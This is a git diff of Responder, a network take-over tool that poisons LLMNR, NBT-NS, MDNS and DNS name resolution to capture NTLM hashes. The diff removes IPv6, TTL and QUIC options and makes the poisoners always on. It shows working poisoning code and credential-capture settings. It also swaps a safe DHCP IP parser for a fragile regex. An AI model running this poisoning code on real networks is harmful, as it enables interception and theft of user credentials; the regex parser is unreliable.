+>Firefox blacklisted on WPAD since it doesn't honors fail-over proxies. Added SO_LINGER to send RST when close() is called.
+>Added new option in Responder.conf. Capture multiple hashes from the same client. Default is On.
+>minor fixes
+>Minor fixes
+>Removed useless HTTP headers
+>Minor fix
+- - - - - - - - - - - - - - - - - - - - - - - - - - -
diff --git a/Contributors b/Contributors
deleted file mode 100644
index 13dbafd..0000000
--- a/Contributors
+++ /dev/null
@@ -1,76 +0,0 @@
-Commits | user
-15 @jrmdev
-7 @nobbd
-6 @ValdikSS
-6 @also-here
-5 @HexPandaa
-5 @exploide
-5 @jvoisin
-4 @Clément Notin
-4 @Shutdown
-4 @Yannick Méheut
-3 @Hank Leininger
-3 @brightio
-3 @byt3bl33d3r
-3 @myst404
-3 @skelsec
-2 @Alexandre ZANNI
-2 @Crypt0-M3lon
-2 @Laban Sköllermark
-2 @Matthew Daley
-2 @Pixis
-2 @Rob Fuller
-2 @ThePirateWhoSmellsOfSunflowers
-2 @Vincent Yiu
-2 @requin
-1 @Andrii Nechytailov
-1 @Antonio Herraiz
-1 @Chris Maddalena
-1 @Euan
-1 @Garret Picchioni
-1 @Gifts
-1 @Gustaf Blomqvist
-1 @Hubert Seiwert
-1 @IMcPwn
-1 @Jared Haight
-1 @Jim Shaver
-1 @Khiem Doan
-1 @Leon Jacobs
-1 @Lionel PRAT
-1 @Markus
-1 @MatToufoutu
-1 @Matt
-1 @Matt Andreko
-1 @Matt Kelly
-1 @Nikos Vassakis
-1 @OJ
-1 @Paul A
-1 @Randy Ramos
-1 @SAERXCIT
-1 @Sagar-Jangam
-1 @Sans23
-1 @Sophie Brun
-1 @Stephen Shkardoon
-1 @Syntricks
-1 @Timon Hackenjos
-1 @Tom Aviv
-1 @Ziga P
-1 @cweedon
-1 @deltronzero
-1 @f3rn0s
-1 @jackassplus
-1 @jb
-1 @kevintellier
-1 @kitchung
-1 @klemou
-1 @lanjelot
-1 @nickyb
-1 @nodauf
-1 @nop5L3D
-1 @pixis
-1 @ravenium
-1 @soa
-1 @steven
-1 @thejosko
-1 @trustedsec
-
diff --git a/DumpHash.py b/DumpHash.py
index daf0382..6ce39db 100755
--- a/DumpHash.py
+++ b/DumpHash.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python3
+#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
diff --git a/README.md b/README.md
index f09820f..7ee2a49 100755
--- a/README.md
+++ b/README.md
@@ -157,29 +157,15 @@ Options:
False
-P, --ProxyAuth Force NTLM (transparently)/Basic (prompt)
authentication for the proxy. WPAD doesn't need to be
- ON. This option is highly effective. Default: False
- -Q, --quiet Tell Responder to be quiet, disables a bunch of
- printing from the poisoners. Default: False
+ ON. Default: False
--lm Force LM hashing downgrade for Windows XP/2003 and
earlier. Default: False
--disable-ess Force ESS downgrade. Default: False
-v, --verbose Increase verbosity.
- -t 1e, --ttl=1e Change the default Windows TTL for poisoned answers.
- Value in hex (30 seconds = 1e). use '-t random' for
- random TTL
- -N ANSWERNAME, --AnswerName=ANSWERNAME
- Specifies the canonical name returned by the LLMNR
- poisoner in tits Answer section. By default, the
- answer's canonical name is the same as the query.
- Changing this value is mainly useful when attempting
- to perform Kebreros relaying over HTTP.
- -E, --ErrorCode Changes the error code returned by the SMB server to
- STATUS_LOGON_FAILURE. By default, the status is
- STATUS_ACCESS_DENIED. Changing this value permits to
- obtain WebDAV authentications from the poisoned
- machines where the WebClient service is running.
+
+
## Donation ##
You can contribute to this project by donating to the following $XLM (Stellar Lumens) address:
diff --git a/Report.py b/Report.py
index ff09e16..a05e6e7 100755
--- a/Report.py
+++ b/Report.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python3
+#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
diff --git a/Responder.conf b/Responder.conf
index 5a4e46a..c157acf 100755
--- a/Responder.conf
+++ b/Responder.conf
@@ -1,30 +1,24 @@
[Responder Core]
-; Poisoners to start
-MDNS = On
-LLMNR = On
-NBTNS = On
-
; Servers to start
-SQL = On
-SMB = On
-QUIC = On
-RDP = On
+SQL = On
+SMB = On
+RDP = On
Kerberos = On
-FTP = On
-POP = On
-SMTP = On
-IMAP = On
-HTTP = On
-HTTPS = On
-DNS = On
-LDAP = On
-DCERPC = On
-WINRM = On
-SNMP = On
-MQTT = On
+FTP = On
+POP = On
+SMTP = On
+IMAP = On
+HTTP = On
+HTTPS = On
+DNS = On
+LDAP = On
+DCERPC = On
+WINRM = On
+SNMP = Off
+MQTT = On
-; Custom challenge.
+; Custom challenge.
; Use "Random" for generating a random challenge for each requests (Default)
Challenge = Random
@@ -59,13 +53,9 @@ RespondToName =
DontRespondTo =
; Specific NBT-NS/LLMNR names not to respond to (default = None)
-; Example: DontRespondToName = NAC, IPS, IDS
+; Example: DontRespondTo = NAC, IPS, IDS
DontRespondToName = ISATAP
-; MDNS TLD not to respond to (default = _dosvc). Do not add the ".", only the TLD.
-; Example: DontRespondToTLD = _dosvc, _blasvc, etc
-DontRespondToTLD = _dosvc
-
; If set to On, we will stop answering further requests from a host
; if a hash has been previously captured for this host.
AutoIgnoreAfterSuccess = Off
@@ -75,8 +65,8 @@ AutoIgnoreAfterSuccess = Off
; This may break file serving and is useful only for hash capture
CaptureMultipleCredentials = On
-; If set to On, we will write to file all hashes captured from the same host.
-; In this case, Responder will log from 172.16.0.12 all user hashes: domain\toto,
+; If set to On, we will write to file all hashes captured from the same host.
+; In this case, Responder will log from 172.16.0.12 all user hashes: domain\toto,
; domain\popo, domain\zozo. Recommended value: On, capture everything.
CaptureMultipleHashFromSameHost = On
diff --git a/Responder.py b/Responder.py
index 952b086..ef945c5 100755
--- a/Responder.py
+++ b/Responder.py
@@ -14,7 +14,6 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
-import asyncio
import optparse
import ssl
try:
@@ -46,9 +45,6 @@ parser.add_option('-Q','--quiet', action="store_true", help="Tell Resp
parser.add_option('--lm', action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
parser.add_option('--disable-ess', action="store_true", help="Force ESS downgrade. Default: False", dest="NOESS_On_Off", default=False)
parser.add_option('-v','--verbose', action="store_true", help="Increase verbosity.", dest="Verbose")
-parser.add_option('-t','--ttl', action="store", help="Change the default Windows TTL for poisoned answers. Value in hex (30 seconds = 1e). use '-t random' for random TTL", dest="TTL", metavar="1e", default=None)
-parser.add_option('-N', '--AnswerName', action="store", help="Specifies the canonical name returned by the LLMNR poisoner in tits Answer section. By default, the answer's canonical name is the same as the query. Changing this value is mainly useful when attempting to perform Kebreros relaying over HTTP.", dest="AnswerName", default=None)
-parser.add_option('-E', '--ErrorCode', action="store_true", help="Changes the error code returned by the SMB server to STATUS_LOGON_FAILURE. By default, the status is STATUS_ACCESS_DENIED. Changing this value permits to obtain WebDAV authentications from the poisoned machines where the WebClient service is running.", dest="ErrorCode", default=False)
options, args = parser.parse_args()
if not os.geteuid() == 0:
@@ -73,8 +69,6 @@ settings.Config.ExpandIPRanges()
#Create the DB, before we start Responder.
CreateResponderDb()
-Have_IPv6 = settings.Config.IPv6
-
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
def server_bind(self):
if OsInterfaceIsSupported():
@@ -84,12 +78,10 @@ class ThreadingUDPServer(ThreadingMixIn, UDPServer):
else:
if (sys.version_info > (3, 0)):
self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
- if Have_IPv6:
- self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
+ self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
else:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
- if Have_IPv6:
- self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
+ self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
except:
pass
UDPServer.server_bind(self)
@@ -103,12 +95,10 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer):
else:
if (sys.version_info > (3, 0)):
self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
- if Have_IPv6:
- self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
+ self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
else:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
- if Have_IPv6:
- self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
+ self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
except:
pass
TCPServer.server_bind(self)
@@ -122,12 +112,10 @@ class ThreadingTCPServerAuth(ThreadingMixIn, TCPServer):
else:
if (sys.version_info > (3, 0)):
self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
- if Have_IPv6:
- self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
+ self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
else:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
- if Have_IPv6:
- self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
+ self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
except:
pass
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
@@ -143,13 +131,11 @@ class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
#IPV6:
if (sys.version_info > (3, 0)):
- if Have_IPv6:
- mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface))
- self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
+ mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface))
+ self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
else:
- if Have_IPv6:
- mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface))
- self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
+ mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface))
+ self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
if OsInterfaceIsSupported():
try:
if settings.Config.Bind_To_ALL:
@@ -157,12 +143,10 @@ class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
else:
if (sys.version_info > (3, 0)):
self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
- if Have_IPv6:
- self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
+ self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
else:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
- if Have_IPv6:
- self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
+ self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
except:
pass
UDPServer.server_bind(self)
@@ -176,9 +160,8 @@ class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,socket.inet_aton(MADDR) + settings.Config.IP_aton)
#IPV6:
- if Have_IPv6:
- mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface))
- self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
+ mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface))
+ self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
if OsInterfaceIsSupported():
try:
if settings.Config.Bind_To_ALL:
@@ -186,36 +169,29 @@ class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
else:
if (sys.version_info > (3, 0)):
self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
- if Have_IPv6:
- self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
+ self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
else:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
- if Have_IPv6:
- self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
+ self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
except:
pass
UDPServer.server_bind(self)
ThreadingUDPServer.allow_reuse_address = 1
-if Have_IPv6:
- ThreadingUDPServer.address_family = socket.AF_INET6
+ThreadingUDPServer.address_family = socket.AF_INET6
ThreadingTCPServer.allow_reuse_address = 1
-if Have_IPv6:
- ThreadingTCPServer.address_family = socket.AF_INET6
+ThreadingTCPServer.address_family = socket.AF_INET6
ThreadingUDPMDNSServer.allow_reuse_address = 1
-if Have_IPv6:
- ThreadingUDPMDNSServer.address_family = socket.AF_INET6
+ThreadingUDPMDNSServer.address_family = socket.AF_INET6
ThreadingUDPLLMNRServer.allow_reuse_address = 1
-if Have_IPv6:
- ThreadingUDPLLMNRServer.address_family = socket.AF_INET6
+ThreadingUDPLLMNRServer.address_family = socket.AF_INET6
ThreadingTCPServerAuth.allow_reuse_address = 1
-if Have_IPv6:
- ThreadingTCPServerAuth.address_family = socket.AF_INET6
+ThreadingTCPServerAuth.address_family = socket.AF_INET6
def serve_thread_udp_broadcast(host, port, handler):
try:
@@ -298,27 +274,20 @@ def main():
if (sys.version_info < (3, 0)):
print(color('\n\n[-]', 3, 1) + " Still using python 2? :(")
print(color('\n[+]', 2, 1) + " Listening for events...\n")
-
+
threads = []
# Load (M)DNS, NBNS and LLMNR Poisoners
- if settings.Config.LLMNR_On_Off:
- from poisoners.LLMNR import LLMNR
- threads.append(Thread(target=serve_LLMNR_poisoner, args=('', 5355, LLMNR,)))
+ from poisoners.LLMNR import LLMNR
+ from poisoners.NBTNS import NBTNS
+ from poisoners.MDNS import MDNS
+ threads.append(Thread(target=serve_LLMNR_poisoner, args=('', 5355, LLMNR,)))
+ threads.append(Thread(target=serve_MDNS_poisoner, args=('', 5353, MDNS,)))
+ threads.append(Thread(target=serve_NBTNS_poisoner, args=('', 137, NBTNS,)))
- if settings.Config.NBTNS_On_Off:
- from poisoners.NBTNS import NBTNS
- threads.append(Thread(target=serve_NBTNS_poisoner, args=('', 137, NBTNS,)))
-
- if settings.Config.MDNS_On_Off:
- from poisoners.MDNS import MDNS
- threads.append(Thread(target=serve_MDNS_poisoner, args=('', 5353, MDNS,)))
-
- #// Vintage Responder BOWSER module, now disabled by default.
- #// Generate to much noise & easily detectable on the network when in analyze mode.
# Load Browser Listener
- #from servers.Browser import Browser
- #threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 138, Browser,)))
+ from servers.Browser import Browser
+ threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 138, Browser,)))
if settings.Config.HTTP_On_Off:
from servers.HTTP import HTTP
@@ -363,12 +332,6 @@ def main():
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 445, SMB1,)))
threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 139, SMB1,)))
- if settings.Config.QUIC_On_Off:
- from servers.QUIC import start_quic_server
- cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
- key = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
- threads.append(Thread(target=lambda: asyncio.run(start_quic_server(settings.Config.Bind_To, cert, key))))
-
if settings.Config.Krb_On_Off:
from servers.Kerberos import KerbTCP, KerbUDP
threads.append(Thread(target=serve_thread_udp, args=('', 88, KerbUDP,)))
diff --git a/packets.py b/packets.py
index bb3134e..12351f4 100644
--- a/packets.py
+++ b/packets.py
@@ -52,7 +52,7 @@ class NBT_Ans(Packet):
("NbtName", ""),
("Type", "\x00\x20"),
("Classy", "\x00\x01"),
- ("TTL", "\x00\x04\x93\xe0"), #TTL: 3 days, 11 hours, 20 minutes (Default windows behavior)
+ ("TTL", "\x00\x00\x00\xa5"),
("Len", "\x00\x06"),
("Flags1", "\x00\x00"),
("IP", "\x00\x00\x00\x00"),
@@ -263,7 +263,7 @@ class LLMNR_Ans(Packet):
("AnswerNameNull", "\x00"),
("Type1", "\x00\x01"),
("Class1", "\x00\x01"),
- ("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec (Default windows behavior)
+ ("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec.
("IPLen", "\x00\x04"),
("IP", "\x00\x00\x00\x00"),
])
@@ -292,7 +292,7 @@ class LLMNR6_Ans(Packet):
("AnswerNameNull", "\x00"),
("Type1", "\x00\x1c"),
("Class1", "\x00\x01"),
- ("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec (Default windows behavior).
+ ("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec.
("IPLen", "\x00\x04"),
("IP", "\x00\x00\x00\x00"),
])
@@ -316,7 +316,7 @@ class MDNS_Ans(Packet):
("AnswerNameNull", "\x00"),
("Type", "\x00\x01"),
("Class", "\x00\x01"),
- ("TTL", "\x00\x00\x00\x78"),##Poison for 2mn (Default windows behavior)
+ ("TTL", "\x00\x00\x00\x78"),##Poison for 2mn.
("IPLen", "\x00\x04"),
("IP", "\x00\x00\x00\x00"),
])
@@ -338,7 +338,7 @@ class MDNS6_Ans(Packet):
("AnswerNameNull", "\x00"),
("Type", "\x00\x1c"),
("Class", "\x00\x01"),
- ("TTL", "\x00\x00\x00\x78"),##Poison for 2mn (Default windows behavior)
+ ("TTL", "\x00\x00\x00\x78"),##Poison for 2mn.
("IPLen", "\x00\x04"),
("IP", "\x00\x00\x00\x00"),
])
@@ -1035,9 +1035,9 @@ class LDAPNTLMChallenge(Packet):
("NTLMSSPNtTargetInfoLen", "\x94\x00"),
("NTLMSSPNtTargetInfoMaxLen", "\x94\x00"),
("NTLMSSPNtTargetInfoBuffOffset", "\x56\x00\x00\x00"),
- ("NegTokenInitSeqMechMessageVersionHigh", "\x0a"),
- ("NegTokenInitSeqMechMessageVersionLow", "\x00"),
- ("NegTokenInitSeqMechMessageVersionBuilt", "\x7c\x4f"),
+ ("NegTokenInitSeqMechMessageVersionHigh", "\x05"),
+ ("NegTokenInitSeqMechMessageVersionLow", "\x02"),
+ ("NegTokenInitSeqMechMessageVersionBuilt", "\xce\x0e"),
("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"),
("NTLMSSPNtWorkstationName", settings.Config.Domain),
diff --git a/poisoners/DHCP.py b/poisoners/DHCP.py
index 3d54126..a0e1713 100755
--- a/poisoners/DHCP.py
+++ b/poisoners/DHCP.py
@@ -239,13 +239,9 @@ def ParseSrcDSTAddr(data):
return SrcIP, SrcPort, DstIP, DstPort
def FindIP(data):
- IPPos = data.find(b"\x32\x04") + 2
- if IPPos == -1 or IPPos + 4 >= len(data) or IPPos == 1:
- #Probably not present in the DHCP options we received, let's grab it from the IP header instead
- return data[12:16]
- else:
- IP = data[IPPos:IPPos+4]
- return IP
+ data = data.decode('latin-1')
+ IP = ''.join(re.findall(r'(?<=\x32\x04)[^EOF]*', data))
+ return ''.join(IP[0:4]).encode('latin-1')
def ParseDHCPCode(data, ClientIP,DHCP_DNS):
global DHCPClient
diff --git a/poisoners/LLMNR.py b/poisoners/LLMNR.py
index 25e020e..3724f51 100755
--- a/poisoners/LLMNR.py
+++ b/poisoners/LLMNR.py
@@ -22,9 +22,6 @@ if (sys.version_info > (3, 0)):
else:
from SocketServer import BaseRequestHandler
-#Should we answer to those AAAA?
-Have_IPv6 = settings.Config.IPv6
-
def Parse_LLMNR_Name(data):
import codecs
NameLen = data[12]
@@ -58,10 +55,6 @@ class LLMNR(BaseRequestHandler): # LLMNR Server class
try:
data, soc = self.request
Name = Parse_LLMNR_Name(data).decode("latin-1")
- if settings.Config.AnswerName is None:
- AnswerName = Name
- else:
- AnswerName = settings.Config.AnswerName
LLMNRType = Parse_IPV6_Addr(data)
# Break out if we don't want to respond to this host
@@ -80,19 +73,12 @@ class LLMNR(BaseRequestHandler): # LLMNR Server class
})
elif LLMNRType == True: # Poisoning Mode
- #Default:
- if settings.Config.TTL == None:
- Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName)
- else:
- Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName, TTL=settings.Config.TTL)
+ Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name)
Buffer1.calculate()
soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
if not settings.Config.Quiet_Mode:
LineHeader = "[*] [LLMNR]"
- if settings.Config.AnswerName is None:
- print(color("%s Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
- else:
- print(color("%s Poisoned answer sent to %s for name %s (spoofed answer name %s)" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name, AnswerName), 2, 1))
+ print(color("%s Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
SavePoisonersToDb({
'Poisoner': 'LLMNR',
'SentToIp': self.client_address[0],
@@ -100,20 +86,13 @@ class LLMNR(BaseRequestHandler): # LLMNR Server class
'AnalyzeMode': '0',
})
- elif LLMNRType == 'IPv6' and Have_IPv6:
- #Default:
- if settings.Config.TTL == None:
- Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName)
- else:
- Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=AnswerName, TTL=settings.Config.TTL)
+ elif LLMNRType == 'IPv6':
+ Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name)
Buffer1.calculate()
soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
if not settings.Config.Quiet_Mode:
LineHeader = "[*] [LLMNR]"
- if settings.Config.AnswerName is None:
- print(color("%s Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
- else:
- print(color("%s Poisoned answer sent to %s for name %s (spoofed answer name %s)" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name, AnswerName), 2, 1))
+ print(color("%s Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
SavePoisonersToDb({
'Poisoner': 'LLMNR6',
'SentToIp': self.client_address[0],
diff --git a/poisoners/MDNS.py b/poisoners/MDNS.py
index 3ef0c7c..a9b555a 100755
--- a/poisoners/MDNS.py
+++ b/poisoners/MDNS.py
@@ -23,9 +23,6 @@ else:
from packets import MDNS_Ans, MDNS6_Ans
from utils import *
-#Should we answer to those AAAA?
-Have_IPv6 = settings.Config.IPv6
-
def Parse_MDNS_Name(data):
try:
if (sys.version_info > (3, 0)):
@@ -73,11 +70,7 @@ class MDNS(BaseRequestHandler):
})
elif MDNSType == True: # Poisoning Mode
Poisoned_Name = Poisoned_MDNS_Name(data)
- #Use default:
- if settings.Config.TTL == None:
- Buffer = MDNS_Ans(AnswerName = Poisoned_Name)
- else:
- Buffer = MDNS_Ans(AnswerName = Poisoned_Name, TTL=settings.Config.TTL)
+ Buffer = MDNS_Ans(AnswerName = Poisoned_Name)
Buffer.calculate()
soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
if not settings.Config.Quiet_Mode:
@@ -89,13 +82,9 @@ class MDNS(BaseRequestHandler):
'AnalyzeMode': '0',
})
- elif MDNSType == 'IPv6' and Have_IPv6: # Poisoning Mode
+ elif MDNSType == 'IPv6': # Poisoning Mode
Poisoned_Name = Poisoned_MDNS_Name(data)
- #Use default:
- if settings.Config.TTL == None:
- Buffer = MDNS6_Ans(AnswerName = Poisoned_Name)
- else:
- Buffer = MDNS6_Ans(AnswerName = Poisoned_Name, TTL= settings.Config.TTL)
+ Buffer = MDNS6_Ans(AnswerName = Poisoned_Name)
Buffer.calculate()
soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
if not settings.Config.Quiet_Mode:
diff --git a/poisoners/NBTNS.py b/poisoners/NBTNS.py
index ff3a1cd..f574a98 100755
--- a/poisoners/NBTNS.py
+++ b/poisoners/NBTNS.py
@@ -44,10 +44,7 @@ class NBTNS(BaseRequestHandler):
'AnalyzeMode': '1',
})
else: # Poisoning Mode
- if settings.Config.TTL == None:
- Buffer1 = NBT_Ans()
- else:
- Buffer1 = NBT_Ans(TTL=settings.Config.TTL)
+ Buffer1 = NBT_Ans()
Buffer1.calculate(data)
socket.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
if not settings.Config.Quiet_Mode:
diff --git a/requirements.txt b/requirements.txt
index 8bd1f34..7823774 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,2 +1 @@
-aioquic
netifaces>=0.10.4
diff --git a/servers/DNS.py b/servers/DNS.py
index 521599d..9bbabbe 100755
--- a/servers/DNS.py
+++ b/servers/DNS.py
@@ -21,9 +21,6 @@ if settings.Config.PY2OR3 == "PY3":
else:
from SocketServer import BaseRequestHandler
-#Should we answer to those AAAA?
-Have_IPv6 = settings.Config.IPv6
-
def ParseDNSType(data):
QueryTypeClass = data[len(data)-4:]
OPT = data[len(data)-22:len(data)-20]
@@ -68,14 +65,14 @@ class DNS(BaseRequestHandler):
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] SRV Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
- if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "IPv6" and Have_IPv6:
+ if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "IPv6":
buff = DNS6_Ans()
buff.calculate(NetworkRecvBufferPython2or3(data))
soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] AAAA Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
- if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv6" and Have_IPv6:
+ if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv6":
buff = DNS6_Ans()
buff.calculate(NetworkRecvBufferPython2or3(data))
soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
@@ -116,14 +113,14 @@ class DNSTCP(BaseRequestHandler):
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] SRV Record poisoned answer sent: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
- if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "IPv6" and Have_IPv6:
+ if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "IPv6":
buff = DNS6_Ans()
buff.calculate(NetworkRecvBufferPython2or3(data))
self.request.send(NetworkSendBufferPython2or3(buff))
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] AAAA Record poisoned answer sent: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
- if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv6" and Have_IPv6:
+ if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv6":
buff = DNS6_AnsOPT()
buff.calculate(NetworkRecvBufferPython2or3(data))
self.request.send(NetworkSendBufferPython2or3(buff))
diff --git a/servers/QUIC.py b/servers/QUIC.py
deleted file mode 100644
index a2397f5..0000000
--- a/servers/QUIC.py
+++ /dev/null
@@ -1,168 +0,0 @@
-import asyncio
-import logging
-import ssl
-import argparse
-import netifaces
-from utils import *
-from aioquic.asyncio import serve
-from aioquic.asyncio.protocol import QuicConnectionProtocol
-from aioquic.quic.configuration import QuicConfiguration
-from aioquic.quic.events import QuicEvent, StreamDataReceived, StreamReset, ConnectionTerminated
-
-BUFFER_SIZE = 11000
-
-def get_interface_ip(interface_name):
- """Get the IP address of a network interface."""
- try:
- # Get address info for the specified interface
- addresses = netifaces.ifaddresses(interface_name)
-
- # Get IPv4 address (AF_INET = IPv4)
- if netifaces.AF_INET in addresses:
- return addresses[netifaces.AF_INET][0]['addr']
-
- # If no IPv4 address, try IPv6 (AF_INET6 = IPv6)
- if netifaces.AF_INET6 in addresses:
- return addresses[netifaces.AF_INET6][0]['addr']
-
- logging.error(f"[!] No IP address found for interface {interface_name}")
- return None
- except ValueError:
- logging.error(f"[!] Interface {interface_name} not found")
- return None
-
-
